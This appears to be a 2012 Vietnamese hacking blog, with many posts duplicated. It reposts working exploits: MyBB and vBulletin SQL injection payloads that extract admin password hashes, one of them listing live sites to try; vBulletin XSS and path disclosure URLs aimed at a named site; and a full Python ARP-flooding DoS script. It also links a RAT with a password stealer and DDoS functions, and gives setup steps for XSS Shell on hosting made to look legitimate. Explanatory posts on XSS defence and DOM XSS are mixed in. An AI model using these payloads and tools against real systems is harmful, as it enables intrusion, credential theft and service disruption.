Sunday, September 16, 2012

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :


---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
Vài site để các bạn test:
Code:
http://icanhazcookie.net
http://edcmania.com
http://livedown.us
......
Thanks all

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :


---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
$~ Get the administrator's password ~

Code:
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count,concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
Vài site để các bạn test:
Code:
http://icanhazcookie.net
http://edcmania.com
http://livedown.us
......
Thanks all

vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scripting

*Advisory Information*

Title: vBulletin Cross Site Scripting Vulnerability

Date published: 02-08-2011

Vendors contacted: vBulletin team



*Vulnerability Information*

Class: XSS flaw

Vulnerable page: Admin Login Page (admincp)

Remotely Exploitable: Yes

Locally Exploitable: No



*Vulnerability Description*

vBulletin is a community forum solution for a wide range of users,
including industry leading companies. A XSS vulnerability has been discovered
that could allow an attacker to carry out an action impersonating a legal user,
or to obtain access to a user's account.

This flaw allows unauthorized disclosure and modification of information,
and it allows disruption of service.



*Vulnerable versions*

4.1.3pl3, 4.1.4pl3 & 4.1.5pl1



*Non-vulnerable Packages*

. vBulletin prior to 4.1.3

*Vendor Information, Solutions and Workarounds*

vBulletin team has released patches for this flaw and patch is released on
02-08-2011. https://www.vbulletin.com/forum/show...Security-Patch



*Credits*

This vulnerability was discovered by Muhammad Haroon from Innovative
Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it



*Proof of Concept Code*

This is a Cross Site Scripting (XSS) vulnerability within vBulletin
community forum solution. In order to exploit this flaw following vector would
be used.

http://www.example.com/forums/admincp/?"><script>alert('Xss_found_By_M.Haroon')</script>



*Report Timeline*

30-07-2011: Notifies the vBulletin team about the vulnerability.

31-07-2011: vBulletin Team ask for technical description about the flaw

31-07-2011: Technical Details sent to vbulletin team

02-08-2011: vBulletin notifies that a fix has been produced and is
available to the users on 2nd August 2011

03-08-2011: Vulnerability publicly disclosed.

vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scripting

*Advisory Information*

Title: vBulletin Cross Site Scripting Vulnerability

Date published: 02-08-2011

Vendors contacted: vBulletin team



*Vulnerability Information*

Class: XSS flaw

Vulnerable page: Admin Login Page (admincp)

Remotely Exploitable: Yes

Locally Exploitable: No



*Vulnerability Description*

vBulletin is a community forum solution for a wide range of users,
including industry leading companies. A XSS vulnerability has been discovered
that could allow an attacker to carry out an action impersonating a legal user,
or to obtain access to a user's account.

This flaw allows unauthorized disclosure and modification of information,
and it allows disruption of service.



*Vulnerable versions*

4.1.3pl3, 4.1.4pl3 & 4.1.5pl1



*Non-vulnerable Packages*

. vBulletin prior to 4.1.3

*Vendor Information, Solutions and Workarounds*

vBulletin team has released patches for this flaw and patch is released on
02-08-2011. https://www.vbulletin.com/forum/show...Security-Patch



*Credits*

This vulnerability was discovered by Muhammad Haroon from Innovative
Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it



*Proof of Concept Code*

This is a Cross Site Scripting (XSS) vulnerability within vBulletin
community forum solution. In order to exploit this flaw following vector would
be used.

http://www.example.com/forums/admincp/?"><script>alert('Xss_found_By_M.Haroon')</script>



*Report Timeline*

30-07-2011: Notifies the vBulletin team about the vulnerability.

31-07-2011: vBulletin Team ask for technical description about the flaw

31-07-2011: Technical Details sent to vbulletin team

02-08-2011: vBulletin notifies that a fix has been produced and is
available to the users on 2nd August 2011

03-08-2011: Vulnerability publicly disclosed.

Netcut 2.0 Denial of Service Vulnerability


#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Blog: http://mayaseven.blogspot.com
#PoC: Video http://www.youtube.com/user/mayaseven
# Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]

def protect(gw_ip,gw_mac):
os.popen("arp -s %s %s" %(gw_ip,gw_mac))
print "Protected himself"

def detect():
ans = sniff(filter='arp',timeout=7)
target=[]
for r in ans.res:
target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
return target

def preattack(gw_ip):
num = []
count = 0
target = 0
temp = 0
print "Detecting..."
d = detect()
for i in range(len(d)):
if d[i].split()[0] == "255.255.255.255":
num.append(d.count(d[i]))
if d.count(d[i]) > count:
count = d.count(d[i])
target = i
if d[i].split()[0] == gw_ip:
temp += 1
if len(d) < 7:
print "[-] No one use Netcut or try again"
exit()
if len(num)*7 < temp:
num[:] = []
count = 0
result = float(temp)/len(d)*100
for j in range(len(d)):
if d[i].split()[0] == gw_ip:
num.append(d.count(d[j]))
if d.count(d[i]) > count:
count = d.count(d[i])
target = i
num.reverse()
result = float(temp)/len(d)*100
print target
else:
num.reverse()
result = float(num[0]+temp)/len(d)*100

print "There is a possibility that " + str(result) + "%"
if result>= 50:
target_mac = d[target].split()[1]
target_ip = d[target].split()[2]
print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
attack(target_mac,target_ip,gw_ip)
else:
print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
print "[+]Counter Attack !!!"
e = Ether(dst="FF:FF:FF:FF:FF:FF")
while 1:
a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
p = e/a/Padding("\x00"*18)
sendp(p,verbose=0)
a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
p1 = e/a1/Padding("\x00"*18)
sendp(p1,verbose=0)

if __name__ == '__main__':
os.system("clear")
print "###################################################"
print " __ __ __ __ _____ __ __ _ _"
print "| \/ | \ \ / / / ____| \ \ / / | \ | |"
print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |"
print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |"
print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |"
print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
print " "
print "###################################################"
print ""
print "http://mayaseven.blogspot.com"
print ""
if len(sys.argv) == 2 or len(sys.argv) == 3:
if len(sys.argv) == 2:
conf.iface=sys.argv[1]
preattack(gw_ip)
if len(sys.argv) == 3:
conf.iface=sys.argv[1]
gw_mac = sys.argv[2]
protect(gw_ip,gw_mac)
preattack(gw_ip)
else:
print '''Mode:
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. NetcutKiller.py wlan0

2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway>
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
'''

vBulletin 3.x.x full path disclosure Vulnerability


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Angel Injection member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] vBulletin all 3 vBulletin full path disclosure Vulnerability
[-] Found by Angel Injection
[-] Version: all 3
[-] Security -::RISK: Just For Information So "Low"
[-] platforms: php
[-] http://1337day.com http://r00tw0rm.com http://i313.cc

[+] Thanx To "Mhd1"


Exploit work on

http://localhost/search.php?do[]=1337

http://localhost/profile.php?do[]=1337

http://localhost/subscription.php?do[]=1337

Online Test

http://www.vbhacker.net/vb/search.php?do[]=i313.cc/313 And 1337day.com

http://www.vbhacker.net/vb/profile.php?do[]=i313.cc/313 And 1337day.com

http://www.vbhacker.net/vb/subscription.php?do[]=i313.cc/313 And 1337day.com


# 1337day.com [2012-07-02]

vBulletin 3.x.x full path disclosure Vulnerability


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Angel Injection member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] vBulletin all 3 vBulletin full path disclosure Vulnerability
[-] Found by Angel Injection
[-] Version: all 3
[-] Security -::RISK: Just For Information So "Low"
[-] platforms: php
[-] http://1337day.com http://r00tw0rm.com http://i313.cc

[+] Thanx To "Mhd1"


Exploit work on

http://localhost/search.php?do[]=1337

http://localhost/profile.php?do[]=1337

http://localhost/subscription.php?do[]=1337

Online Test

http://www.vbhacker.net/vb/search.php?do[]=i313.cc/313 And 1337day.com

http://www.vbhacker.net/vb/profile.php?do[]=i313.cc/313 And 1337day.com

http://www.vbhacker.net/vb/subscription.php?do[]=i313.cc/313 And 1337day.com


# 1337day.com [2012-07-02]

vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day

# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+



The vulnerability exists within /request_award.php.

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.


- POC -
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit


Thanks. Have fun.

http://www.bugabuse.net/

vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day

# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+



The vulnerability exists within /request_award.php.

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.


- POC -
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit


Thanks. Have fun.

http://www.bugabuse.net/

[TUT] Hack Account ADSL VNPT [8/7/2012]

TUT này nhìn sơ thì có vẻ k có gì nguy hiểm... nhưng nếu chúng ta biết cách thì có thể đổ cmd vào đó... và dùng thêm dyndns để cập nhật ip .. (nếu victim có dis ra thì Ip sẽ thay đổi)

TUT này có thể áp dụng cho cả FPT

Link: http://www.mediafire.com/?7h955j77ge094ew

TUT này k có gì đặc sắc .. những ai chưa biết thì có thể xem để biết thêm

[TUT] Hack Account ADSL VNPT [8/7/2012]

TUT này nhìn sơ thì có vẻ k có gì nguy hiểm... nhưng nếu chúng ta biết cách thì có thể đổ cmd vào đó... và dùng thêm dyndns để cập nhật ip .. (nếu victim có dis ra thì Ip sẽ thay đổi)

TUT này có thể áp dụng cho cả FPT

Link: http://www.mediafire.com/?7h955j77ge094ew

TUT này k có gì đặc sắc .. những ai chưa biết thì có thể xem để biết thêm

vBulletin "Search UI" SQL Injection vbb 4.0.1 > 4.1.4

POST /search.php?do=process HTTP/1.1  
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

Kết quả ta thu được:

<!--  
Database error in vBulletin 4.1.4:
Invalid SQL:
SELECT socialgroupcategory.title
FROM socialgroupcategory AS socialgroupcategory
WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)&gt;(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);
MySQL Error : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'
Error Number : 1062
Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM
Error Date : Wednesday, July 20th 2011 @ 10:24:59 PM
Script : http://127.0.0.1/search.php?do=process
Referrer :
IP Address : 127.0.0.1
Username : Unregistered
Classname : vB_Database
MySQL Version :
-->

vBulletin "Search UI" SQL Injection vbb 4.0.1 > 4.1.4

POST /search.php?do=process HTTP/1.1  
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

Kết quả ta thu được:

<!--  
Database error in vBulletin 4.1.4:
Invalid SQL:
SELECT socialgroupcategory.title
FROM socialgroupcategory AS socialgroupcategory
WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)&gt;(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);
MySQL Error : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'
Error Number : 1062
Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM
Error Date : Wednesday, July 20th 2011 @ 10:24:59 PM
Script : http://127.0.0.1/search.php?do=process
Referrer :
IP Address : 127.0.0.1
Username : Unregistered
Classname : vB_Database
MySQL Version :
-->

[XSS] - Google Transplate

XSS was found on Google Sandbox (translate.googleusercontent.com).

Download Video Testing:
http://www.mediafire.com/?o6ya4bnnyn7kzdt
Pass Unlock: junookyo
P/S: Testing by Juno_okyo.

R-RAT - Đơn giản nhưng very strong!

* Giao diện :


- Đôi lời giới thiệu về cái này :
* Đây là phiên bản RAT do một người bạn của tôi phát triển vào năm 2011 tôi xem cũng thấy có nhiều chỗ được viết theo lối vòng lặp gây tiêu tốn khá nhiều tài nguyên nên đã code lại . Dù không tiện lợi như những phiên bản RAT khác do những lập trình viên khác làm ra nhưng có thể nói rằng phiên bản R-RAT này khá đầy đủ chức năng của một RAT !

* Chức năng - Đặc điểm :
+ DDOS Flood | 3 Type : HTTP , UDP , SYN
+ Remote Download / Execute
+ File Manager ( Dễ gây lỗi cho bot nên đã tháo )
+ Password Stealer
+ Windows Key Stealer
+ Update
+ Unistall
+ Binder File

* Một vài hình ảnh về chức năng của RAT :


* Và Cuối Cùng Là Link Download : http://mup5.com/75497

Nguồn: VHB

R-RAT - Đơn giản nhưng very strong!

* Giao diện :


- Đôi lời giới thiệu về cái này :
* Đây là phiên bản RAT do một người bạn của tôi phát triển vào năm 2011 tôi xem cũng thấy có nhiều chỗ được viết theo lối vòng lặp gây tiêu tốn khá nhiều tài nguyên nên đã code lại . Dù không tiện lợi như những phiên bản RAT khác do những lập trình viên khác làm ra nhưng có thể nói rằng phiên bản R-RAT này khá đầy đủ chức năng của một RAT !

* Chức năng - Đặc điểm :
+ DDOS Flood | 3 Type : HTTP , UDP , SYN
+ Remote Download / Execute
+ File Manager ( Dễ gây lỗi cho bot nên đã tháo )
+ Password Stealer
+ Windows Key Stealer
+ Update
+ Unistall
+ Binder File

* Một vài hình ảnh về chức năng của RAT :


* Và Cuối Cùng Là Link Download : http://mup5.com/75497

Nguồn: VHB

Computer Hacking Forensic Investigator - CHFI

CHFI - ĐIỀU TRA TỘI PHẠM MÁY TÍNH


Module 01: Computer Forensics in Today’s World

Module 02: Law and Computer Forensics

Module 03: Computer Investigation Process

Module 04: First Responder Procedure

Module 05 : CSIRT

Module 06: Computer Forensic Lab

Module 07: Understanding File Systems and Hard Disks

Module 08: Understanding Digital Media Devices

Module 09: Windows, Linux and Macintosh Boot Processes

Module 10: Windows Forensics

Module 11: Linux Forensics

Module 12: Data Acquisition and Duplication

Module 13: Computer Forensic Tools

Module 14: Forensics Investigations Using Encase

Module 15: Recovering Deleted Files and Deleted partitions

Module 16: Image Files Forensics

Module 17: Steganography

Module: 18: Application Password Crackers

Module 19: Network Forensics and Investigating Logs

Module 20: Investigating Network Traffic

Module 21: Investigating Wireless Attacks

Module 22: Investigating Web Attacks

Module 23: Router Forensics

Module 24: Investigating DoS Attacks

Module 25: Investigating Internet Crimes

Module 26: Tracking E-mails and Investigating E-mail Crimes

Module 27: Investigating Corporate Espionage

Module 28: Investigating Trademark and Copyright Infringement

Module 29: Investigating sexually harassment incidents

http://www.mediafire.com/?4kwnoo0jji5p95v (pass unlock: soleil_vhb)

Nguồn: VHB

Làm menu sổ xuống dùng CSS3 - Dropdown Menu using CSS3



Demo:

http://demo.sinhvienit.net/js_html_f...menu-css3-169/

Với mẫu code này bạn có thể tạo 1 list menu có thể sổ xuống dùng CSS3 đơn giản.

Download: Click here!

XSS Attack - Part 7

Hey awl in diz tut i will be telling uhh awl countermeasures against XSS :)

Countermeasures

Check and validate all the form fields, hidden fields, headers, cookies, query strings and all the parameters against a rigorous specification.

Implement a stringent security policy.

Web servers, applications servers, and web application environments are vulnerable to cross-site scripting. It is hard to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code, and search in all the places where input from an HTTP request comes as an output through HTML.


A variety of different HTML tags can be used to transmit a malicious JavaScript. Nessus, Nikto and other tools can help to some extent for scanning website for these flaws. If vulnerability is discovered in one website, there is a high chance of it being vulnerable to other attacks.

Find the script output to defeat XSS vulnerability which can prevent then from being transmitted to users.

The entire code of the website has to be reviewed if it has to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas should be checked as follows, the headers, as well as cookies, query string from fields and hidden fields. During the validation process, there must be no attempt to recognize the active content, neither to remove the filter nor sanitize it.

There are many ways to encode the known filters for active content. A “positive security policy” is highly recommended, which specifies what has to be allowed and what has to be removed. Negative or attack signature-based policies are hard to maintain, as they are incomplete.

Input fields should be limited to a maximum since most script attacks need several characters to get granted.

XSS Attack - Part 6

Hey awl  h0wz yuh well in diz tut i will be giving uhh awl a brief xplanation on DOM based XSS attacks :) :)

I will not be gng 2 deep cz its quite confusioning i will be posting abt it in detail later :D although m also working on it dese days :P




DOM-based is unique form of XSS, used very similarly to non-persistent, but where the JavaScript malware payload doesn’t need to be sent or echoed by the Web site to exploit auser. Consider our eCommerce Web site example (Figure 1.1.), where a feature on the Website is used to display sales promotions.The following URL queries the backend database for the information specified by the product_id value which is shown to the user. (Figure 1.2)
Fig 1.2 Fig 1.2
To make the user experience a bit more dynamicity, the title value of the URL’s can be updated on the fly to include different impulse-buy text

Example 1

http://victim/promo?product_id=100&title=Last+Chance!
http://victim/promo?product_id=100&title=Only+10+Left!
Etc.
The value of the title is automatically written to the page using some resident JavaScript.

Example 2

<script>
var url = window.location.href;
var pos = url.indexOf("title=") + 6;
var len = url.length;
var title_string = url.substring(pos,len);
document.write(unescape(title_string));
</script>
This is where the problem is. In this scenario, the client-side JavaScript blindly trusts the data contained in the URL and renders it to the screen.This trust can be leveraged to craft the following URL that contains some JavaScript malware on the end.

Example 3

http://victim/promo?product_id=100&title=Foo#<SCRIPT>alert('XSS%20Testing')
</SCRIPT>
As before, this URL can be manipulated to SRC in additional JavaScript malware from any location on the Web. What makes this style of XSS different, is that the JavaScript malware payload does not get sent to the Web server. As defined by Request For Comment (RFC), the “fragment” portion of the URL, after the pound sign, indicates to the Web browser which point of the current document to jump to. Fragment data does not get sent to the Web server and stays within the DOM. Hence the name, DOM-based XSS.



DOM is a World Wide Web Consortium (W3C) specification, which defines the object model for representing XML and HTML structures. In the eXtensible Markup Language (XML) world, there are mainly two types of parsers, DOM and SAX. SAX is a parsing mechanism, which is significantly faster and less memory-intensive but also not very intuitive, because it is not easy to go back to the document nodes (i.e. the parsing mechanism is one way). On the other hand, DOM-based parsers load the entire document as an object structure, which contains methods and variables to easily move around the document and modify nodes, values, and attributes on the fly.
Browsers work with DOM. When a page is loaded, the browser parses the resulting page into an object structure.The getElementsByTagName is a standard DOM function that is usedto locate XML/HTML nodes based on their tag name. DOM-based XSS is the exploitation of an input validation vulnerability that is caused by the client, not the server. In other words, DOM-based XSS is not a result of a vulnerability within a server side script, but an improper handling of user supplied data in the client side JavaScript. Like the other types of XSS vulnerabilities, DOM-based XSS can be used to steal confidential information or hijack the user account. However, it is essential to understand that this type of vulnerability solely relies upon JavaScript and insecure use of dynamically obtained data from the DOM structure.
Here is a simple example of a DOM-base XSS provided by Amit Klein in his paper “Dom Based Cross Site Scripting or XSS of the Third Kind”:
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf(“name=”)+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system

</HTML>
If we analyze the code of the example, you will see that the developer has forgotten to sanitize the value of the “name” get parameter, which is subsequently written inside the document as soon as it is retrieved. In the following section, we study a few more DOM based XSS examples based on a fictitious application that we created.

Identifying DOM-based XSS Vulnerabilities

Let’s walk through the process of identifying DOM-based XSS vulnerabilities using a fictitious Asynchronous Javascript and XML (AJAX) application.
First, we have to create a page on the local system that contains the following code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<link rel="stylesheet"
href="http://www.gnucitizen.org/styles/screen.css" type="text/css"/>
<link rel="stylesheet"
href="http://www.gnucitizen.org/styles/content.css" type="text/css"/>
<script src="http://jquery.com/src/jquery-latest.pack.js"
type="text/javascript"></script>
<title>Awesome</title>
</head>
<body>
<div id="header">
<h1>Awesome</h1>
<p>awesome ajax application</p>
</div>
<div id="content">
<div>
<p>Please, enter your nick and press
<strong>chat</strong>!</p>
<input name="name" type="text" size="50"/><br/><input
name="chat" value="Chat" type="button"/>
</div>
</div>
<script>
$('[@name="chat"]').click(function () {
var name = $('[@name="name"]').val();
$('#content > div').fadeOut(null, function () {
$(this).html('<p>Welcome ' + name + '! You can
type your message into the form below.</p><textarea class="pane">' + name + ' &gt;
</textarea>');
$(this).fadeIn();

});
});
</script>
<div id="footer">
<p>Awesome AJAX Application</p>
</div>
</body>
</html>
Next, open the file in your browser (requires JavaScript to be enabled).The application looks like that shown in Figure 1.3
Fig 1.3 Fig 1.4
Once the page is loaded, enter your name and press the Chat button.This example is limited in that you cannot communicate with other users.We deliberately simplified the application so that we can concentrate on the actual vulnerability rather than the application design. Figure 1.4 shows the AJAX application in action.
Notice that this AJAX application does not need a server to perform the desired functions. Remember, you are running it straight from your desktop. Everything is handled by your browser via JavaScript and jQuery.
** jQuery is a useful AJAX library created by John Resig. jQuery significantly simplifies AJAX development, and makes it easy for developers to code in a cross-browser manner.**
If you carefully examine the structure and logic of the JavaScript code, you will see that the “Awesome AJAX application” is vulnerable to XSS.The part responsible for this input sanitization failure is as follows:
$(this).html('<p>Welcome ' + name + '! You can type your message into the form
below.</p><textarea class="pane">' + name + ' &gt; </textarea>');
As seen, the application composes a HTML string via JQuery’s HTML function.The html function modifies the content of the selected element.This string includes the data from the nickname input field. In our case, the input’s value is “Bob.” However, because the application fails to sanitize the name, we can virtually input any other type of HTML, even script elements, as shown on Figure 1.5
Fig 1.5 Fig 1.6
If you press the Chat button, you will inject the malicious payload into the DOM.This payload composes a string that looks like the following:
<p>Welcome <script>alert('xss')</script>! You can type your message 
into the form below.</p><textarea class="pane"><script>alert('xss')
</script> &gt; </textarea>
This is known as non-persistent DOM-based XSS. Figure 1.6 shows the output of the exploit.

XSS Attack - Part 5

TAKING COMMON XSS VULNERABILITIES TO THE NEXT LEVEL


Hey awl 2oday I will tell  you two neat tools which can be used to leverage common XSS vulnerabilities and allow you to take them to the next level. There are a lot of admins and general techies who don't think XSS vulnerabilities are anything to be concerned about. What can a simple alert box do? Hopefully after today you will look at your code a little harder and have a little more respect for all those pesky XSS finds. This is based on my recent experience in setting these up and seeing the results in real time which lead me to feel the need to share this. Here we go

Things you need



XSS Shell & XSS Tunnel, both available here in single download

Path Disclosure Script, available here



Create an account at any of your favorite ASP hosting sites, usually a free one will do. Now create and upload a index file to have something for quick checks to see if anything is there (and to throw off suspicion) so your site seems legit. Now we will upload the Path Disclosure Script you downloaded above (path.asp) and then navigate in our browser to it in order to find out what our default install path is so we can setup our db.asp file for connections to our MS-ACCESS database file.



Write down what you see on the screen, remove file, and then go and edit the db.asp for XSS Shell for the following line of code, change path to what you found above:
'// DATABASE CONFIGURATION
Const DBPATH = "X:\path\to\site\install”

 Once that is done, create a zip file for all of the content in our XSS Shell folder and name it SSX.zip. Then use your control panel features to unzip the content to speed up XSS Shell site build-out (otherwise it takes forever to upload one by one). 





Remove the .zip file and the path finder script to clean things up, so it should look something like this once done:

